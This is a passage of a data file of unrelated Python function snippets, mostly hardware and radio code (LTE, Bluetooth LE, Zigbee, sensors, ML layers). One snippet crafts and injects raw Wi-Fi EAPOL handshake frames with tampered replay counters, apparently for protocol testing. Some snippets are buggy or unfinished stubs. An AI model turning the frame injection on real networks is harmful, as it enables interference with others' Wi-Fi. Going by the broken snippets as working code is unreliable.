self.setup_tdd(earfcn1,bwMhz,powerdBm,ud_config)\r\r\n else:\r\r\n self.setup_fdd(earfcn1,bwMhz,powerdBm)\r\r\n\r\r\n self.GetTesterMeasurments(exp_powerdBm=powerdBm,\r\r\n tol_dB=tol_dB)\r\r\n\r\r\n self.modemObj.disable_tx()\r\r\n\r\r\n # Set band2\r\r\n earfcn2 = lte_util.ul_Default_EARFCN(band2)\r\r\n self.set_band(band2)\r\r\n self.modemObj.set_rat_band(rat='LTE', band=band2)\r\r\n duplex_mode = self.get_duplex_mode()\r\r\n self.instr.lte_tx.set_duplex_mode(duplex_mode)\r\r\n self.instr.lte_tx.set_band(band2)\r\r\n\r\r\n if duplex_mode == 'TDD':\r\r\n self.set_ud_config(ud_config)\r\r\n self.modemObj.set_ud_config(ud_config)\r\r\n self.instr.lte_tx.set_ul_dl_conf(ud_config)\r\r\n meas_sf = 2\r\r\n self.set_meas_sf(meas_sf)\r\r\n self.instr.lte_tx.conf_measurement_subframe(measSubframe=meas_sf)\r\r\n\r\r\n bursted = duplex_mode == 'TDD' and ud_config != \"TEST1\"\r\r\n self.setup_tdd_trigger(bursted,special_sf_config=0)\r\r\n\r\r\n _,freq_ul2,_ = lte_util.get_lte_ul_dl_freq_band(earfcn2)\r\r\n self.modemObj.set_freqMHz(freqMHz=freq_ul2)\r\r\n self.instr.lte_tx.set_rf_freqMHz(freq_ul2)\r\r\n\r\r\n self.modemObj.enable_tx()\r\r\n\r\r\n self.GetTesterMeasurments(exp_powerdBm=powerdBm,\r\r\n tol_dB=tol_dB)", "def add_layer(self, layer):\n\t\tif isinstance(layer, Layer):\n\t\t\tif layer != self:\n\t\t\t\tself.sublayers.append(layer)\n\t\t\t\tlayer.superlayer = self\n\t\telse:\n\t\t\traise TypeError('Invalid layer object')", "def tx_power(self, sta, iface):\n self.txpower[str(sta)] = sta.cmd('iwconfig %s | grep -o \\'Tx-Power.*\\' | cut -f2- -d\\'=\\''% iface)", "def test_device_on(self):\n self.ms.add_response({'\\x14081031031E226410\\x0D': 'PA\\x0D'})\n # Network / Device ID\n response = self.upb.on((49, 3))\n self.assertTrue(response)", "def test_ic(wire_widths = [0.25, 0.5, 1, 2, 4],\n wire_widths_wide = [0.75, 1.5, 3, 4, 6], pad_size = (200, 200),\n pad_gap = 75, wire_layer = 0, pad_layer = 1, gnd_layer = 1):\n ICS = Device('test_ic')\n\n # if gnd_layer is None: gnd_layer = pad_layer\n translation = 0\n padb = ICS.add_ref(\n rectangle(\n size = (np.size(wire_widths) * (pad_size[0]*6/5), pad_size[1]),\n layer = wire_layer\n )\n )\n\n padb_overlay = ICS.add_ref(\n rectangle(size = ((np.size(wire_widths) * (pad_size[0]*6/5)) * 9/10,\n pad_size[1] * 9/10),\n layer = gnd_layer)\n )\n padb_overlay.center = padb.center\n padb_overlay.ymin = padb.ymin\n for i, x in enumerate(wire_widths_wide):\n padt = ICS.add_ref(rectangle(pad_size, wire_layer))\n padt.xmin = padb.xmin + translation\n padt.ymin = padb.ymax + pad_gap\n 
padt_overlay = ICS.add_ref(\n rectangle(size = (pad_size[0] * 9/10, pad_size[1] * 9/10),\n layer = pad_layer)\n )\n padt_overlay.center = padt.center\n padt_overlay.ymax = padt.ymax\n difference = padt.ymin-padb.ymax\n wire_step = ICS.add_ref(\n _test_ic_wire_step(wire_widths_wide[i], wire_widths[i],\n wire_layer = wire_layer)\n )\n wire_step.rotate(90)\n wire_step.center = (padt.center[0], padb.ymax + difference/2)\n translation = translation + pad_size[0] * 12/10\n conn_wire_top = ICS.add_ref(\n rectangle(size = (wire_widths_wide[i], padt.ymin-wire_step.ymax),\n layer = wire_layer)\n )\n conn_wire_bottom = ICS.add_ref(\n rectangle(size = (wire_widths_wide[i], wire_step.ymin-padb.ymax),\n layer = wire_layer)\n )\n conn_wire_top.ymax = padt.ymin\n conn_wire_top.xmin = wire_step.xmin\n conn_wire_bottom.ymin = padb.ymax\n conn_wire_bottom.xmin = wire_step.xmin\n\n return ICS", "def add_device(self, noInit=True, **kwargs):\n self.epicsLive.add_device(noInit=noInit, **kwargs)\n aliases = self.epicsLive._aliases\n if not self._det.get('epicsLive'):\n self._det['epicsLive'] = {}\n self._det['epicsLive'].update({'attrs': aliases})", "def draw(self, layer: Layer) -> None:\r\n if layer and layer.layer_index >= self.num_layers:\r\n return\r\n\r\n pyxel.bltm(layer.offset.x, layer.offset.y, self.tilemap_id + layer.layer_index,\r\n self.rect_uv.x, self.rect_uv.y, self.rect_uv.w, self.rect_uv.h,\r\n colkey=layer.transparency_color)", "async def initialize(self, hw_init=False, init_speed: str = \"200 sec / stroke\"):\n await self.pump_io.initialize()\n # Test connectivity by querying the pump's firmware version\n fw_cmd = Protocol1Command(command=\"U\", target_pump_num=self.address)\n self.metadata.version = await self.pump_io.write_and_read_reply_async(fw_cmd)\n logger.info(\n f\"Connected to Hamilton ML600 {self.name} - FW version: {self.metadata.version}!\"\n )\n\n if hw_init:\n await self.initialize_pump(speed=ureg.Quantity(init_speed))", "async def send_panel_req(self, ba, bb):\n if not self.connected:\n return\n\n data = bytearray(10)\n data[0] = M_START\n data[1] = 8\n data[2] = mtypes[BMTS_PANEL_REQ][0]\n data[3] = mtypes[BMTS_PANEL_REQ][1]\n data[4] = mtypes[BMTS_PANEL_REQ][2]\n data[5] = ba\n data[6] = 0\n data[7] = bb\n data[8] = messages.Message.crc(data[1:8])\n data[9] = M_END\n\n self.writer.write(data)\n await self.writer.drain()", "def add_pump(self, name, start_node_name, end_node_name, pump_type='POWER',\n pump_parameter=50.0, speed=1.0, pattern=None, initial_status='OPEN'):\n self._link_reg.add_pump(name, start_node_name, end_node_name, pump_type, \n pump_parameter, speed, pattern, initial_status)", "def __init__( self, address = None, smbus = None ):\n\n if not address: address = self.DEFAULT_I2C_ADDRESS\n self.__address = address\n \n if not bus: bus = self.DEFAULT_BUS\n self.__bus = smbus.SMBus( bus )\n\n self.__bus.write_byte_data( self.address, self.PWR_MGMT_1, self.WAKE )", "async def async_turn_aux_heat_on(self) -> None:\n self._aux = True\n self.async_write_ha_state()", "def RequestUserAttention(self, dc, window, text, rect, pane): \r\n\r\n state = pane.state\r\n pane.state &= ~optionActive\r\n \r\n for indx in xrange(6):\r\n active = (indx%2 == 0 and [True] or [False])[0]\r\n if active:\r\n pane.state |= optionActive\r\n else:\r\n pane.state &= ~optionActive\r\n \r\n self.DrawCaptionBackground(dc, rect, pane)\r\n self.DrawCaption(dc, window, text, rect, pane)\r\n wx.SafeYield()\r\n wx.MilliSleep(350)\r\n\r\n pane.state = state", "def cmndWithDriver(self, commands, 
time):\n\t\tif self.usesDriver: #don't need to reserve driver..\n\t\t\tcommands.append((hold, self, time))\n\t\t\treturn commands\n\t\telse:\n\t\t\tprio=1\n\t\t\tfor pH in self.plantHeads:\n\t\t\t\tif pH.usesDriver: #set a high priority.\n\t\t\t\t\tprio = 2\n\t\t\tcommands.extend([(request, self, self.driver, prio)])\n\t\t\tself.usesDriver=True #this means that a reservation from the driver has been sent, not that he currently has the attention here.\n\t\t\tif prio==1: #we are \"taking the driver\" from the other device, not from our own heads\n\t\t\t\tswitchTime=self.m.times['switchFocus']\n\t\t\t\tif self.driver.isIdle(): #check for how long he's been idle\n\t\t\t\t\tswitchTime-=self.driver.idleTime()\n\t\t\t\t\tif switchTime<0: switchTime=0\n\t\t\t\tcommands.extend([(hold, self, switchTime)]) #add time to switch focus\n\t\t\t\tself.m.timeConsumption['switchFocus']+=switchTime\n\t\t\tcommands.extend([(hold, self, time)])\n\t\treturn commands", "def __init__(self, dev):\n\n self.dev = dev\n\n # do pygatt communication in the background\n self.gatt = PyGattThread(dev)\n self.gatt.start()", "def run(self):\n cached_char = Characteristic(BLE_TEMP_UUID, BLE_TEMP_HANDLE)\n adapter = GATTToolBackend()\n while True:\n try:\n _LOGGER.debug(\"Connecting to %s\", self.name)\n # We need concurrent connect, so lets not reset the device\n adapter.start(reset_on_start=False)\n # Seems only one connection can be initiated at a time\n with CONNECT_LOCK:\n device = adapter.connect(\n self.mac, CONNECT_TIMEOUT, BLEAddressType.random\n )\n if SKIP_HANDLE_LOOKUP:\n # HACK: inject handle mapping collected offline\n # pylint: disable-next=protected-access\n device._characteristics[UUID(BLE_TEMP_UUID)] = cached_char\n # Magic: writing this makes device happy\n device.char_write_handle(0x1B, bytearray([255]), False)\n device.subscribe(BLE_TEMP_UUID, self._update)\n _LOGGER.info(\"Subscribed to %s\", self.name)\n while self.keep_going:\n # protect against stale connections, just read temperature\n device.char_read(BLE_TEMP_UUID, timeout=CONNECT_TIMEOUT)\n self.event.wait(60)\n break\n except (BLEError, NotConnectedError, NotificationTimeout) as ex:\n _LOGGER.error(\"Exception: %s \", str(ex))\n finally:\n adapter.stop()", "def addWlan(self, station): \n phyInt.phy[station] = phyInt.totalPhy[self.currentPhy][3:]\n os.system(\"iw phy phy%s set netns %s\" % (phyInt.phy[station], station.pid)) \n wif = station.cmd(\"iwconfig 2>&1 | grep IEEE | awk '{print $1}'\").split(\"\\n\")\n wif.pop()\n for iface in wif:\n if iface[:4]==\"wlan\":\n try:\n self.nextWlan[str(station)] += 1\n except:\n self.nextWlan[str(station)] = 0\n netxWlan = self.nextWlan[str(station)] \n self.renameIface(station, netxWlan, iface)\n self.currentPhy+=1", "def add_datamap(self, ctx, datamap):\n zing_state = self._get_zing_tx_state()\n zing_state.datamaps.append((ctx.device(), datamap))", "def broadcast(loopstate):\n cmdstring = 'sudo hcitool -i hci0 cmd ' # Send cmd to hci0\n cmdstring += '0x08 ' # Set group to BLE\n cmdstring += '0x0008 ' # Set command to HCI_LE_Set_Advertising_Data\n cmdstring += '0D ' # Length of entire following data, in bytes\n cmdstring += '02 ' # Length of flag info\n cmdstring += '01 ' # Use AD flags\n cmdstring += '02 ' # Flag value:\n # bit 0 (OFF) LE Limited Discoverable Mode\n # bit 1 (ON) LE General Discoverable Mode\n # bit 2 (OFF) BR/EDR Not Supported\n # bit 3 (ON) Simultaneous LE and BR/EDR to Same Device Capable (controller)\n # bit 4 (ON) Simultaneous LE and BR/EDR to Same Device Capable (Host)\n cmdstring += 
'09 ' # Length of following message, in bytes\n cmdstring += '07 ' # GAP value (07 = 128 Bit Complete Service UUID List)\n cmdstring += '42 69 63 79 63 6c 65 ' # Header to identify beacon message-\n # - and it's also is Bicycle in ASCII!\n if loopstate:\n cmdstring = cmdstring + LOOP_ON\n else:\n cmdstring = cmdstring + LOOP_OFF + ' >/dev/null 2>&1'\n subprocess.call(cmdstring, shell=True)\n subprocess.call('sudo hciconfig hci0 leadv 3 >/dev/null 2>&1', shell=True)", "def __init__(self, alias, adapter=None):\n\n dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)\n\n self.bus = dbus.SystemBus()\n\n if not adapter:\n adapter = self._find_adapter()\n if not adapter:\n logger.error(\"Could not find any adapter implementing GattManager1 + LEAdvertisingManager1 interfaces\")\n raise BleNotSupportedException(\n \"No adapter implementing GattManager1 + LEAdvertisingManager1 found\")\n self._adapter_path = '/org/bluez/' + adapter\n self._device_properties_changed_signal = None\n self._adapter_properties_changed_signal = None\n self._main_loop = None\n self.on_remote_disconnected = None\n\n self._adapter_props = dbus.Interface(\n self.bus.get_object(BLUEZ_SERVICE_NAME, self._adapter_path), DBUS_PROP_IFACE)\n\n self._disable_br_edr()\n\n logger.info(\"Creating BLE Peripheral with alias: %s\" % alias)\n\n self.alias = alias\n self.is_powered = True\n self.discoverable_timeout = 0\n self.is_advertising = False\n\n # Prepare Managers:\n\n self._ad_manager = dbus.Interface(\n self.bus.get_object(BLUEZ_SERVICE_NAME, self._adapter_path),\n LE_ADVERTISING_MANAGER_IFACE)\n\n self._gatt_manager = dbus.Interface(\n self.bus.get_object(BLUEZ_SERVICE_NAME, self._adapter_path),\n GATT_MANAGER_IFACE)\n\n # Create Advertisement and GATT Application:\n\n self._advertisement = Advertisement(self.bus, 0, 'peripheral')\n self._app = Application(self.bus)", "def transmitPollAck(): \n global data\n DW1000.newTransmit()\n data[0] = C.POLL_ACK\n data[17] = anchorID #data[17] is tag Id data[18] is anchor Id\n data[18] = tagID #data[17] is tag Id data[18] is anchor Id\n DW1000.setDelay(REPLY_DELAY_TIME_US, C.MICROSECONDS)\n DW1000.setData(data, LEN_DATA)\n DW1000.startTransmit()", "def configure(self, attr_dict=None):\n self.free_buf()\n self.__init__(self.phyAddress,self.direction,attr_dict)", "def RequestUserAttention(self, dc, window, text, rect, pane): \r\n \r\n state = pane.state\r\n pane.state &= ~optionActive\r\n \r\n for indx in xrange(6):\r\n active = (indx%2 == 0 and [True] or [False])[0]\r\n if active:\r\n pane.state |= optionActive\r\n else:\r\n pane.state &= ~optionActive\r\n \r\n self.DrawCaptionBackground(dc, rect, pane)\r\n self.DrawCaption(dc, window, text, rect, pane)\r\n wx.SafeYield()\r\n wx.MilliSleep(350)\r\n\r\n pane.state = state", "def _Attention(self, name, is_causal=True):\n p = self.params\n tr_atten_p = TransformerAttentionLayer.Params().Set(\n name='transformer_atten',\n input_dim=p.model_dim,\n hidden_dim=p.attention_hidden_dim or p.model_dim,\n is_masked=is_causal,\n num_heads=p.num_heads,\n residual_dropout_prob=p.residual_dropout_prob,\n atten_dropout_prob=p.atten_dropout_prob,\n fprop_dtype=p.fprop_dtype,\n add_unnormalized_input=p.selfatten_add_unnormalized_input,\n )\n tr_atten_p.atten_tpl.use_bias = p.use_bias\n tr_atten_p.atten_tpl.enable_value_proj = p.selfatten_enable_value_proj\n tr_atten_p.atten_tpl.enable_query_scale = p.enable_query_scale\n tr_atten_p.atten_tpl.enable_per_dim_scale = p.enable_per_dim_scale\n tr_atten_p.atten_tpl.device_mesh = p.device_mesh\n 
tr_atten_p.atten_tpl.weight_split_dims_mapping = (\n p.weight_split_dims_mapping.dnh)\n tr_atten_p.atten_tpl.activation_split_dims_mapping.blnh = (\n p.activation_split_dims_mapping.blnh)\n tr_atten_p.atten_tpl.activation_split_dims_mapping.bld = (\n p.activation_split_dims_mapping.bld)\n if p.deterministic_dropout:\n tr_atten_p.dropout_tpl = layers.DeterministicDropoutLayer.Params()\n tr_atten_p.atten_p.dropout_tpl = layers.DeterministicDropoutLayer.Params()\n\n return self._Graph(\n name,\n ['i'], # input NestedMap with {vec, paddings}\n ['o'], # output NestedMap with {vec, paddings}\n ('i.vec->split_i',\n self.MeshSplit('input_split', p.activation_split_dims_mapping.bld)),\n ('split_i,split_i,i.paddings->o.vec,unused_prob', tr_atten_p),\n ('i.paddings->o.paddings', self._Id('id')))", "def add_loop_packet(self, packet):\n with self.run_lock:\n self._add_loop_packet(packet)", "def append_or_update_layer(self, layer: 'Layer'):\n if layer.has_pos():\n self.layers[layer.get_pos()] = layer\n else:\n self.layers.append(layer)\n layer.set_pos(self.get_num_layers() - 1)", "def loopattach(diskimg):\n result = subprocess.run(['losetup', '--find', diskimg], check=True)\n return loopdev(diskimg)", "def run_mainloop():\n \n # List of sensor node addresses expected to be in the network\n node_addr = [2, 3]\n \n # Data gathering time parameters [Frequenct data gathering and network discovery for testing]\n data_gathering_interval = 60*1000 # [msec]\n net_discovery_interval = 3 # (re)do network discovery every 3 cycles \n \n # Enable the NM3 power supply on the powermodule\n powermodule = PowerModule()\n powermodule.enable_nm3()\n\n # Enable power supply to 232 driver\n pyb.Pin.board.EN_3V3.on()\n pyb.Pin('Y5', pyb.Pin.OUT, value=0) # enable Y4 Pin as output\n max3221e = MAX3221E(pyb.Pin.board.Y5)\n max3221e.tx_force_on() # Enable Tx Driver\n \n # Wait for 6 seconds to let the modem start up\n print(\"6 second delay to allow the NM3 to boot up...\")\n pyb.delay(6*1000)\n\n # Initialize UART and NM3 object\n uart = machine.UART(1, 9600, bits=8, parity=None, stop=1, timeout=1000)\n modem = Nm3(uart)\n\n # Create and initialize the network protocol object\n net_protocol = gw_node.NetProtocol()\n net_protocol.init(modem, node_addr)\n \n # Start by doing the network discovery and setup\n net_protocol.do_net_discovery()\n net_protocol.setup_net_schedule() # guard interval [msec] can be specified as function input (default: 500)\n \n # Extract network topology and schedule information as JSON\n net_info = net_protocol.get_net_info_json()\n print(net_info) # print it in this test script (send over Wi-Fi in the real app)\n\n # Start an infinite loop, gathering sensor data\n cycle_counter = 0\n while True:\n \n # Perform a cycle of data gathering\n cycle_counter += 1\n frame_start_time = utime.ticks_ms() # update the frame start time\n stay_awake = (cycle_counter == net_discovery_interval) # if this is the last cycle before network re-discovery\n time_till_next_frame = data_gathering_interval # for sleep synchronisation (this can also be variable between frames)\n packets = net_protocol.gather_sensor_data(time_till_next_frame, stay_awake)\n # A list of MessagePacket objects is returned, to be processed and transmitted over Wi-Fi\n \n # If this was the last cycle before network re-discovery\n if (cycle_counter == net_discovery_interval):\n # Do network discovery and setup again (the network should be awake now)\n net_protocol.do_net_discovery()\n net_protocol.setup_net_schedule()\n cycle_counter = 0\n # When 
finished, instruct the network to sleep until the next frame\n time_till_next_frame = data_gathering_interval - utime.ticks_diff(utime.ticks_ms(), frame_start_time)\n net_protocol.set_network_to_sleep(time_till_next_frame)\n # Extract network topology and schedule information as JSON\n net_info = net_protocol.get_net_info_json()\n print(net_info) # print it in this test script (send over Wi-Fi in the real app)\n\n # Go to sleep yourself until the start of next frame\n # [This will need to be replaced by a proper sleep mode (with powered down modules)]\n time_till_next_frame = data_gathering_interval - utime.ticks_diff(utime.ticks_ms(), frame_start_time)\n pyb.delay(time_till_next_frame)", "def bulb_on():\n tx = zb_explicit_command\n tx[\"dest_addr_long\"] = GE_LINK_BULB_MAC\n tx[\"cluster\"] = CLUSTER_A\n tx[\"data\"] = DATA_ON\n response = zb.Send(tx)", "def connect(self):\n\n self.wm = telnetlib.Telnet(self.ip, self.port, self.timeout)\n time.sleep(2)\n print self.wm.read_very_eager() #clears connection message\n self.measure_chan()", "def imu_init(self, chain: machine.I2C = None, freq=400000, debug=False):\n if self.antenny_config.get(\"use_bno055\"):\n print(\"use_bno055 found in config: {}\".format(self.antenny_config.get_name()))\n if chain is None:\n i2c_bno_scl = self.antenny_config.get(\"i2c_bno_scl\")\n i2c_bno_sda = self.antenny_config.get(\"i2c_bno_sda\")\n self.i2c_bno = self.i2c_init(1, i2c_bno_scl, i2c_bno_sda, freq=freq)\n else:\n self.i2c_bno = chain\n self.imu = Bno055ImuController(\n self.i2c_bno,\n crystal=False,\n address=self.antenny_config.get(\"i2c_bno_address\"),\n sign=(0, 0, 0)\n )\n self.imu_load()\n self.imu.upload_calibration_profile()\n print(\"IMU connected\")\n elif self.antenny_config.get(\"use_bno08x_i2c\"):\n print(\"use_bno08x_i2c found in config: {}\".format(self.antenny_config.get_name()))\n if chain is None:\n i2c_bno_scl = self.antenny_config.get(\"i2c_bno_scl\")\n i2c_bno_sda = self.antenny_config.get(\"i2c_bno_sda\")\n self.i2c_bno = self.i2c_init(1, i2c_bno_scl, i2c_bno_sda, freq=freq)\n else:\n self.i2c_bno = chain\n ps0 = machine.Pin(self.antenny_config.get(\"bno_ps0\"), machine.Pin.OUT)\n ps1 = machine.Pin(self.antenny_config.get(\"bno_ps1\"), machine.Pin.OUT)\n reset = machine.Pin(self.antenny_config.get(\"bno_rst\"), machine.Pin.OUT)\n ps0.off()\n ps1.off()\n self.imu = Bno08xImuController(\n self.i2c_bno,\n debug=debug,\n reset=reset\n )\n self.imu.reset_calibration()\n print(\"IMU connected\")\n elif self.antenny_config.get(\"use_bno08x_rvc\"):\n print(\"use_bno08x_rvc found in config: {}\".format(self.antenny_config.get_name()))\n tx = self.antenny_config.get(\"i2c_bno_scl\")\n rx = self.antenny_config.get(\"i2c_bno_sda\")\n reset = machine.Pin(self.antenny_config.get(\"bno_rst\"), machine.Pin.OUT)\n ps0 = self.antenny_config.get(\"bno_ps0\")\n ps1 = self.antenny_config.get(\"bno_ps1\")\n if ps0 is not None and ps1 is not None:\n ps0 = machine.Pin(ps0, machine.Pin.OUT)\n ps1 = machine.Pin(ps1, machine.Pin.OUT)\n ps0.on()\n ps1.off()\n uart_bno = self.uart_init(1, rx, tx, baud=115200)\n self.imu = Bno08xUARTImuController(\n uart_bno,\n reset=reset\n )\n self.imu.reset_calibration()\n time.sleep(.5)\n self.imu.start()\n print(\"IMU connected\")\n else:\n self.imu = MockImuController()\n print(\"According to your config, ou do not have an IMU connected\")\n return self.imu", "def fw_handshake_2_4_tkip( self , vendor , eapolMIC = True , eapolMICFlag = True , customFlaglist = None , customRC = None ):\n\t\tparameterList = 'vendor=' + 
str(vendor) + ',eapolMIC=' + str(eapolMIC) + ',eapolMICFlag=' + str(eapolMICFlag) + ',customFlaglist=' + str(customFlaglist) + ',customRC=' + str(customRC)\n\t\tself.logger.log( self.logger.TRANSMIT , 'EAPOL 4-Way Handshake Message 2/4 TKIP (' + parameterList + ')')\n\t\ttry:\n\t\t\n\t\t\t# Create an empty EAPOL WPA Key packet.\n\t\t\tpacket \t\t= EAPOL( version=1 , type='EAPOL-Key' )/EAPOL_Key()/EAPOL_WPAKey()\n\t\t\tpacketKey \t= packet.getlayer( EAPOL_WPAKey )\n\t\t\tif vendor != 'NONE':\n\t\t\t\tvendorInfo = Dot11Elt( ID='vendor' , info=getVendorInfo( type=vendor ) )\n\t\t\tflaglist = ['HMAC_MD5_RC4','idx0','pairwise']\n\t\t\tif eapolMICFlag is True:\n\t\t\t\tflaglist.append('mic')\n\t\t\t\n\t\t\t# Fill in the fields.\n\t\t\tif customFlaglist is not None:\n\t\t\t\tflaglist = customFlaglist\n\t\t\tpacketKey.KeyInfo = self.__getKeyInformation( flaglist )\n\t\t\tif customRC is not None:\n\t\t\t\tif customRC == 'lower':\t\n\t\t\t\t\tself.replayCounter -= 1\n\t\t\t\telif customRC == 'higher':\n\t\t\t\t\tself.replayCounter += 1\n\t\t\tpacketKey.ReplayCounter = self.replayCounter\n\t\t\tpacketKey.Nonce = self.SNonce\n\t\t\tif vendor != 'NONE':\n\t\t\t\tpacketKey.WPAKeyLength \t= len( vendorInfo )\n\t\t\t\tpacketKey.WPAKey \t= vendorInfo\n\t\t\t\n\t\t\t# Calculate and add the MIC.\n\t\t\tif eapolMIC is True:\n\t\t\t\tmic = HMAC.new( self.KCK , msg=str( packet ) , digestmod=Crypto.Hash.MD5 )\n\t\t\t\tpacketKey.WPAKeyMIC = mic.digest()\n\t\t\t\n\t\t\t# Transmit.\n\t\t\tsendp(RadioTap()/\n\t\t\t\tDot11( addr1=self.addr1 , addr2=self.addr2 , addr3=self.addr1 , type='Data' , subtype=0x00 , FCfield='to-DS' )/\n\t\t\t\tLLC( dsap=0xaa , ssap=0xaa , ctrl=0x03 )/\n\t\t\t\tSNAP( OUI=0x000000 , code=0x888e )/\n\t\t\t\tpacket,\n\t\t\t\tiface=self.iface , verbose=False )\n\t\t\t\t\n\t\texcept:\n\t\t\traise", "def train_layer(self, h, t):\n\n mr1h = torch.matmul(h, self.mr1.weight) # h => [m, self.ent_hidden_size], self.mr1 => [self.ent_hidden_size, self.rel_hidden_size]\n mr2t = torch.matmul(t, self.mr2.weight) # t => [m, self.ent_hidden_size], self.mr2 => [self.ent_hidden_size, self.rel_hidden_size]\n\n expanded_h = h.unsqueeze(dim=0).repeat(self.rel_hidden_size, 1, 1) # [self.rel_hidden_size, m, self.ent_hidden_size]\n expanded_t = t.unsqueeze(dim=-1) # [m, self.ent_hidden_size, 1]\n\n temp = (torch.matmul(expanded_h, self.mr.weight.view(self.rel_hidden_size, self.ent_hidden_size, self.ent_hidden_size))).permute(1, 0, 2) # [m, self.rel_hidden_size, self.ent_hidden_size]\n htmrt = torch.squeeze(torch.matmul(temp, expanded_t), dim=-1) # [m, self.rel_hidden_size]\n\n return F.tanh(htmrt + mr1h + mr2t + self.br.weight)", "def Attention_block(up_in,down_in,nf):\n# def MyTile(alpha, channels):\n# alpha = tf.tile(alpha, [1, 1, 1, 1, channels])\n# return alpha\n# def MyTile_output_shape(input_shape):\n# shape = list(input_shape)\n# assert len(shape) == 5 # only valid for 2D tensors\n# shape[-1] *= channels\n# return tuple(shape)\n ndims = len(up_in.get_shape()) - 2\n assert ndims in [1, 2, 3], \"ndims should be one of 1, 2, or 3. 
found: %d\" % ndims\n input_channels = up_in.get_shape().as_list()[-1]\n# batch_size1 = tf.shape(down_in)[0]\n# nf = tf.min(batch_size0,batch_size1)\n Conv = getattr(KL, 'Conv%dD' % ndims)\n up = Conv(nf, kernel_size=1, padding='same',\n kernel_initializer='he_normal', strides=2)(up_in)\n down = Conv(nf, kernel_size=1, padding='same',\n kernel_initializer='he_normal', strides=1)(down_in)\n\n# x = NCCLayer(channels=nf)([up,down])\n x = Add()([up,down])\n x = Activation('relu')(x)\n x = Conv(1, kernel_size=1, padding='same',\n kernel_initializer='he_normal', use_bias = True, bias_initializer='zeros',strides=1,activation='sigmoid')(x)\n# x = Activation('sigmoid')(x)\n upsample_layer = getattr(KL, 'UpSampling%dD' % ndims)\n alpha = upsample_layer()(x)\n# alpha = Lambda(MyTile)(alpha, input_channels)\n alpha = MyTile(channels=input_channels)(alpha)\n up_out = Multiply()([alpha,up_in])\n return up_out", "def highway_layer(input_data, dim, init, name='', reuse=None,\n activation=tf.nn.relu):\n print(\"Constructing highway layer..\")\n trans = linear(input_data, dim, init, name='trans_{}'.format(name),\n reuse=reuse)\n trans = activation(trans)\n gate = linear(input_data, dim, init, name='gate_{}'.format(name),\n reuse=reuse)\n gate = tf.nn.sigmoid(gate)\n if(dim!=input_data.get_shape()[-1]):\n input_data = linear(input_data, dim, init,name='trans2_{}'.format(name),\n reuse=reuse)\n output = gate * trans + (1-gate) * input_data\n return output", "def ll_uart_set_cmd_timeout(self,timeout = 10):\r\n\r\n self._ll_rx_timeout = timeout", "def do_connect(self):\n # Attempting STA connection\n print('connecting to network...')\n\n self.sta_if.active(True)\n self.sta_if.connect(self.ssid, self.password)\n for retry_count in range(self.num_retries):\n if self.sta_if.isconnected():\n break\n print(\"Waiting for connection {}/{}\".format(retry_count, self.num_retries))\n time.sleep(1)\n\n # Success:\n if self.sta_if.isconnected():\n self.mode = STA_MODE\n print('network config:', self.sta_if.ifconfig())\n for _ in range(self.num_retries):\n try:\n ntptime.settime()\n break\n except:\n pass\n time.sleep(1)\n\n # Failure, starting access point\n else:\n print('Could not connect, creating WiFi access point')\n self.sta_if.active(False)\n self.create_ap()\n self.mode = AP_MODE", "def brief_led_flash(self):\n self._ubx.send('CFG-TP5', pulseLenRatioLock=990000)", "def setup(self,chip,line,mode):\n if len(self.chips[chip]) < line:\n raise ValueError(\"invalid line offset\")\n chip_line = gpio_chips[chip][line]\n if mode == OUT:\n chip_line['direction'] = OUT\n else:\n chip_line['direction'] = IN", "def enterBitBang():\n # Enter bitbang mode\n for i in xrange(20):\n ser.write(\"\\x00\")\n if \"BBIO1\" not in ser.read(5):\n print \"Could not get into bbIO mode\"\n sys.exit(0)\n\n # Enter UART mode\n ser.write(\"\\x03\")\n time.sleep(0.01)\n #Baud rate : 9600\n ser.write(chr(0b01100100))\n ser.read(1)\n #Peripherals : power ON / pullup ON\n ser.write(chr(0b01001100))\n ser.read(1)\n #Start UART bridge\n ser.write(chr(0b00001111))\n ser.read(1)", "def expandWithoutMutex(self, previousLayer):\n previousLayerProposition = previousLayer.getPropositionLayer()\n \"*** YOUR CODE HERE ***\"", "def test_gatt_connect_mitm_attack(self):\n gatt_server_cb = self.per_ad.droid.gattServerCreateGattServerCallback()\n gatt_server = self.per_ad.droid.gattServerOpenGattServer(\n gatt_server_cb)\n self.gatt_server_list.append(gatt_server)\n service_uuid = \"3846D7A0-69C8-11E4-BA00-0002A5D5C51B\"\n test_uuid = 
\"aa7edd5a-4d1d-4f0e-883a-d145616a1630\"\n bonded = False\n characteristic = self.per_ad.droid.gattServerCreateBluetoothGattCharacteristic(\n test_uuid, gatt_characteristic['property_write'],\n gatt_characteristic['permission_write_encrypted_mitm'])\n gatt_service = self.per_ad.droid.gattServerCreateService(\n service_uuid, gatt_service_types['primary'])\n self.per_ad.droid.gattServerAddCharacteristicToService(gatt_service,\n characteristic)\n self.per_ad.droid.gattServerAddService(gatt_server, gatt_service)\n result = self._find_service_added_event(gatt_server_cb, service_uuid)\n if not result:\n return False\n bluetooth_gatt, gatt_callback, adv_callback = (\n orchestrate_gatt_connection(self.cen_ad, self.per_ad))\n self.bluetooth_gatt_list.append(bluetooth_gatt)\n self.adv_instances.append(adv_callback)\n if self.cen_ad.droid.gattClientDiscoverServices(bluetooth_gatt):\n expected_event = gatt_cb_strings['gatt_serv_disc'].format(\n gatt_callback)\n try:\n event = self.cen_ad.ed.pop_event(expected_event,\n self.default_timeout)\n except Empty:\n self.log.error(gatt_cb_err['gatt_serv_disc'].format(\n expected_event))\n return False\n discovered_services_index = event['data']['ServicesIndex']\n else:\n self.log.info(\"Failed to discover services.\")\n return False\n test_value = [1, 2, 3, 4, 5, 6, 7]\n services_count = self.cen_ad.droid.gattClientGetDiscoveredServicesCount(\n discovered_services_index)\n for i in range(services_count):\n characteristic_uuids = (\n self.cen_ad.droid.gattClientGetDiscoveredCharacteristicUuids(\n discovered_services_index, i))\n for characteristic_uuid in characteristic_uuids:\n if characteristic_uuid == test_uuid:\n self.cen_ad.droid.bluetoothStartPairingHelper()\n self.per_ad.droid.bluetoothStartPairingHelper()\n self.cen_ad.droid.gattClientCharacteristicSetValue(\n bluetooth_gatt, discovered_services_index, i,\n characteristic_uuid, test_value)\n self.cen_ad.droid.gattClientWriteCharacteristic(\n bluetooth_gatt, discovered_services_index, i,\n characteristic_uuid)\n start_time = time.time() + self.default_timeout\n target_name = self.per_ad.droid.bluetoothGetLocalName()\n while time.time() < start_time and bonded == False:\n bonded_devices = \\\n self.cen_ad.droid.bluetoothGetBondedDevices()\n for device in bonded_devices:\n if ('name' in 